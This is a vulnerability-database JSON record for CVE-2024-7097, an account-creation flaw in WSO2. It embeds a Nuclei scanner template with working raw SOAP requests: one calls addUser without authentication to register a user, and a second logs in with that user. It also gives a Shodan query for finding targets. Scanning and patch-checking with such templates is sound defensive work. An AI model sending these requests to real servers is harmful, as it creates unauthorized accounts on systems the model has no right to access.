{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-7097/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-7097/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-7097/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-7097/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-7097/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-7097"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-7097"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-7097.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2024-7097\n\ninfo:\n  name: WSO2 User Registration - Arbitrary Account Creation\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: medium\n  description: |\n    The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.\n  impact: |\n    Unauthenticated attackers can bypass self-registration restrictions to create arbitrary user accounts, potentially gaining unauthorized access to the WSO2 system and its resources.\n  remediation: |\n    Apply security patches from WSO2 as outlined in security advisory WSO2-2024-3574 to address the arbitrary account creation vulnerability.\n  reference:\n    - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/\n    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/\n  classification:\n    epss-score: 0.00665\n    epss-percentile: 0.4959\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: \"WSO2 Carbon Server\"\n  tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev,vuln\n\nvariables:\n  username: \"{{randstr_1}}\"\n  password: \"{{randstr_2}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1\n        Host: {{Hostname}}\n        SOAPAction: \"urn:addUser\"\n        Content-Type: text/xml\n\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\n        xmlns:xsd=\"http://org.apache.axis2/xsd\">\n           <soapenv:Header/>\n           <soapenv:Body>\n              <xsd:addUser>\n        <xsd:user>\n                 <xsd:userName>{{username}}</xsd:userName>\n                 <xsd:password>{{password}}</xsd:password>\n        </xsd:user>\n              </xsd:addUser>\n           </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers:\n      - type: status\n        status:\n          - 202\n        internal: true\n\n  - raw:\n      - |\n        POST /services/AuthenticationAdmin HTTP/1.1\n        Host: {{Hostname}}\n        SOAPAction: \"\"\n        Content-Type: text/xml\n\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\n                          xmlns:aut=\"http://authentication.services.core.carbon.wso2.org\">\n           <soapenv:Header/>\n           <soapenv:Body>\n              <aut:login>\n                 <aut:username>{{username}}</aut:username>\n                 <aut:password>{{password}}</aut:password>\n              </aut:login>\n           </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers:\n      - type: word\n        words:\n          - \"loginResponse\"\n          - \"<ns:return>true</ns:return>\"\n        condition: and\n# digest: 4b0a00483046022100a039a2eac02bf962d8f6f78674eddf92a5db5077005cecd159442831d16bde9b0221008035d9c60ee163d44bb32b8e9e8cb94b070e89e192d71fe635442bba2b7d6090:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-7097"
}